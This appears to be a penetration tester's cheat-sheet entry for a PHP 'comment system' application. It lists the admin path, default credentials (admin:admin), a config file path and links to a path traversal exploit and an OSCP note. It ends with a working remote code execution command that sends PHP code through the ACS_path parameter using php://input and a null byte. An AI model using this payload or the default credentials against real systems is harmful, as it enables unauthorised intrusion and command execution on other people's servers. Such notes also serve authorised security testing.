comment system

Admin Path

/admin.php

Default Credentials

admin:admin

Interesting Paths

/config.php

Path Traversal v1.0

• https://www.exploit-db.com/exploits/49343

RCE

v1.0

• https://pentest.tonyng.net/timo-sablowskis-oscp-note/#php

curl "IP/PATH/admin.php?ACS_path=php://input%00" -s --data "<?system('ls -la');?>"